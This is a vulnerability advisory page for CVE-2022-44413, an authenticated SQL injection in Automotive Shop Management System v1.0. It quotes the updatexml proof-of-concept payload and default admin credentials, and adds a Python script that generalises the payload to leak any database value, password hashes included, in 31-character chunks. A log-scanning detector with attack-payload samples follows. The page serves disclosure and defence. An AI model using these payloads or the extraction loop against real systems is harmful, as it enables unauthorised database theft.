VYPR
Unrated severity · NVD Advisory · Published Nov 18, 2022 · Updated Apr 29, 2025

CVE-2022-44413

Description

Automotive Shop Management System v1.0 is vulnerable to SQL Injection via /asms/admin/mechanics/manage_mechanic.php?id=.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Automotive Shop Management System v1.0 has a SQL injection vulnerability in manage_mechanic.php via the id parameter.

Vulnerability

Automotive Shop Management System v1.0, a PHP-based application by oretnom23, contains a SQL injection vulnerability in the manage_mechanic.php script. The id parameter passed via GET request is not sanitized before being used in a database query, allowing an attacker to inject arbitrary SQL commands. The affected file is located at /asms/admin/mechanics/manage_mechanic.php?id=. [1]

Exploitation

An attacker must be authenticated as a Super Admin (e.g., with the default credentials admin/admin123) to reach the vulnerable endpoint. The exploit is a single crafted GET request with a malicious id parameter. The proof-of-concept payload id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ decodes to 1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)-- : the quote closes the string literal, updatexml() is handed a deliberately invalid XPath expression built from the subquery's result, and MySQL echoes that expression back in its "XPATH syntax error" message, which the page displays. This error-based injection reveals the database name (asms_db). The request can be sent from a web browser or with a tool like cURL. [1]
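The following is an added example, not code from the advisory or from the Automotive Shop Management System project. It shows the mechanics behind the proof-of-concept: how the encoded id value reaches PHP, how the leaked text is parsed out of the echoed MySQL error, and how the technique generalises to values longer than the 32 characters MySQL shows in an XPATH error (password hashes, for instance) by reading them 31 characters per request with SUBSTRING(). It runs offline against a constructed stand-in for the vulnerable page (fake_server); the only artefact taken from the advisory is POC_PAYLOAD. FAKE_DB, its users/password names and the hash value are assumptions made for the demo, not the application's real schema or data.

```python
"""Error-based (updatexml) SQL injection mechanics for CVE-2022-44413.

Added example, not code from the Automotive Shop Management System project.
It runs offline against a constructed stand-in for the vulnerable page; the
only artefact taken from the advisory is the proof-of-concept payload.
"""
import re
from typing import Callable, Optional
from urllib.parse import quote, unquote_plus

# Proof-of-concept id value quoted in the advisory, URL-encoded as sent.
POC_PAYLOAD = "1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+"

# MySQL shows at most 32 characters of the bad XPath expression in its
# "XPATH syntax error" message; the leading '~' delimiter uses one of them,
# so each request can leak 31 characters of the target value.
ERROR_WINDOW = 32
CHUNK = ERROR_WINDOW - 1

LEAK_RE = re.compile(r"XPATH syntax error: '~(.*?)~?'")


def decode_payload(encoded: str) -> str:
    """Return the id value as PHP's $_GET['id'] receives it ('+' becomes a space)."""
    return unquote_plus(encoded)


def updatexml_payload(expression: str, offset: int = 1) -> str:
    """Build an encoded id that leaks one 31-character window of `expression`.

    Generalises the advisory's payload: any scalar subquery can replace
    `select database()`, and `offset` chooses which window to read.
    """
    window = f"substring(({expression}),{offset},{CHUNK})"
    sql = f"1' and updatexml(1,concat(0x7e,{window},0x7e),0)-- "
    return quote(sql, safe="")


def extract_leak(response_body: str) -> Optional[str]:
    """Pull the leaked text out of a page that echoes the MySQL error."""
    m = LEAK_RE.search(response_body)
    return m.group(1) if m else None


def read_value(expression: str, send: Callable[[str], str]) -> str:
    """Reassemble a value longer than one error window, 31 characters per request.

    `send` takes the encoded id and returns the response body; against a real
    target it would be an authenticated HTTP client, here it is fake_server.
    """
    out, offset = "", 1
    while True:
        chunk = extract_leak(send(updatexml_payload(expression, offset)))
        if not chunk:
            break
        out += chunk
        if len(chunk) < CHUNK:
            break
        offset += len(chunk)
    return out


# Constructed stand-in for manage_mechanic.php. The table/column names and
# the hash in FAKE_DB are assumptions for the demo, not the real schema.
FAKE_DB = {
    "select database()": "asms_db",
    "select password from users limit 1": "e10adc3949ba59abbe56e057f20f883e",
}


def fake_server(encoded_id: str) -> str:
    """Answer like a PHP page whose concatenated query hits a MySQL error.

    Only the expressions in FAKE_DB are "evaluated"; the 32-character
    truncation mimics MySQL's XPATH error message.
    """
    sql = decode_payload(encoded_id)
    m = re.search(r"concat\(0x7e,(.+),0x7e\)", sql)
    if not m:
        return "<html><body>Mechanic not found</body></html>"
    inner = m.group(1)
    sub = re.fullmatch(r"substring\(\((.+)\),(\d+),(\d+)\)", inner)
    if sub:
        expr, start, length = sub.group(1), int(sub.group(2)), int(sub.group(3))
    else:
        expr = inner[1:-1] if inner.startswith("(") and inner.endswith(")") else inner
        start, length = 1, None
    value = FAKE_DB.get(expr.lower())
    if value is None:
        return "<html><body>Mechanic not found</body></html>"
    window = value[start - 1:] if length is None else value[start - 1:start - 1 + length]
    leaked = ("~" + window + "~")[:ERROR_WINDOW]
    return ("<b>Fatal error</b>: Uncaught mysqli_sql_exception: "
            f"XPATH syntax error: '{leaked}'")


if __name__ == "__main__":
    print("decoded PoC :", decode_payload(POC_PAYLOAD))
    print("database()  :", extract_leak(fake_server(POC_PAYLOAD)))
    print("long value  :", read_value("select password from users limit 1", fake_server))
```

The loop in read_value is the part that matters for the Impact section: once one error message is readable, the window size is the only limit, and chunking with SUBSTRING() removes it.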

Impact

Successful exploitation lets an authenticated attacker read data from the database, including login credentials, user data and application secrets. The updatexml technique in the proof-of-concept is not limited to database(): any scalar subquery can be substituted, so data from any table the application's database user can read is retrievable, amounting to a full read of the database. The privilege required is Super Admin, so the attacker already holds the application's highest role, but the injection still yields data the application never exposes through its interface, which may be used for further attacks. [1]

Mitigation

As of publication (November 2022), no patch has been released by the vendor. The application is built on PHP 8.1 and is distributed as open source through SourceCodester. The fix is to stop concatenating the id parameter into SQL in manage_mechanic.php: cast it to an integer, or bind it through a mysqli or PDO prepared statement. Until a fix is available, restrict Super Admin accounts, change the default admin/admin123 credentials, and monitor web-server logs for requests to manage_mechanic.php whose id parameter is anything other than a plain integer. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog. [1]
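The following is an added example, not part of the advisory or the ASMS project, showing the log check the paragraph above recommends. It parses constructed Apache-style access log lines (SAMPLE_LOG is made up for the demo; only the request path and the first attack payload come from the advisory, the extractvalue and double-encoded lines are illustrative variants), fully URL-decodes the id parameter, and flags every request to manage_mechanic.php whose id is not a plain integer. The allow-list test is the detector, so it fires on payloads the marker list does not know; the markers only tell the analyst why.

```python
"""Flag CVE-2022-44413 exploitation attempts in web-server access logs.

Added example, not part of the advisory or the ASMS project. SAMPLE_LOG is
constructed (Apache combined format); the request path and the first attack
payload are the ones quoted in the advisory, the rest are variants.
"""
import re
from dataclasses import dataclass, field
from typing import List
from urllib.parse import unquote_plus, urlsplit

VULN_PATH = "/asms/admin/mechanics/manage_mechanic.php"

SAMPLE_LOG = """\
10.0.0.5 - - [18/Nov/2022:10:01:02 +0000] "GET /asms/admin/mechanics/manage_mechanic.php?id=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [18/Nov/2022:10:01:09 +0000] "GET /asms/admin/?page=mechanics HTTP/1.1" 200 8801 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Nov/2022:10:02:14 +0000] "GET /asms/admin/mechanics/manage_mechanic.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1" 500 612 "-" "curl/7.81.0"
203.0.113.7 - - [18/Nov/2022:10:02:20 +0000] "GET /asms/admin/mechanics/manage_mechanic.php?id=1%27%20and%20extractvalue(1,concat(0x7e,version()))--+ HTTP/1.1" 500 598 "-" "curl/7.81.0"
203.0.113.7 - - [18/Nov/2022:10:02:31 +0000] "GET /asms/admin/mechanics/manage_mechanic.php?id=1%2527%2520and%25201%253D1 HTTP/1.1" 200 5120 "-" "curl/7.81.0"
"""

# Apache/nginx combined log: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Tokens worth naming in the alert; the decision itself does not rely on them.
SQLI_MARKERS = re.compile(
    r"updatexml\s*\(|extractvalue\s*\(|\bunion\b|\bsleep\s*\(|benchmark\s*\(|--|/\*|'",
    re.IGNORECASE,
)


@dataclass
class Finding:
    ip: str
    timestamp: str
    status: int
    raw_id: str        # value exactly as it appeared in the request line
    decoded_id: str    # after undoing (possibly repeated) URL encoding
    markers: List[str] = field(default_factory=list)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Undo repeated percent-encoding; attackers double-encode to slip past filters."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def sql_markers(decoded_id: str) -> List[str]:
    """Sorted, lower-cased list of SQL-looking tokens in a decoded id value."""
    return sorted({m.group(0).lower() for m in SQLI_MARKERS.finditer(decoded_id)})


def raw_query_values(query: str, name: str) -> List[str]:
    """Return the still-encoded values of parameter `name` (parse_qs would decode them)."""
    values = []
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == name:
            values.append(value)
    return values


def scan(log_text: str) -> List[Finding]:
    """One Finding per request to the vulnerable page whose id is not a plain integer."""
    findings: List[Finding] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path != VULN_PATH:
            continue
        for raw in raw_query_values(url.query, "id"):
            decoded = fully_decode(raw)
            if decoded.isdigit():
                continue  # well-formed request, nothing to report
            findings.append(Finding(m["ip"], m["ts"], int(m["status"]),
                                    raw, decoded, sql_markers(decoded)))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.timestamp} {f.ip} status={f.status} id={f.decoded_id!r} markers={f.markers}")
```

Run against real logs, the same check is cheap enough to apply to every admin endpoint that takes a numeric id, not just this one; the path constant is the only thing specific to CVE-2022-44413.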

AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

1

News mentions

0

No linked articles in our index yet.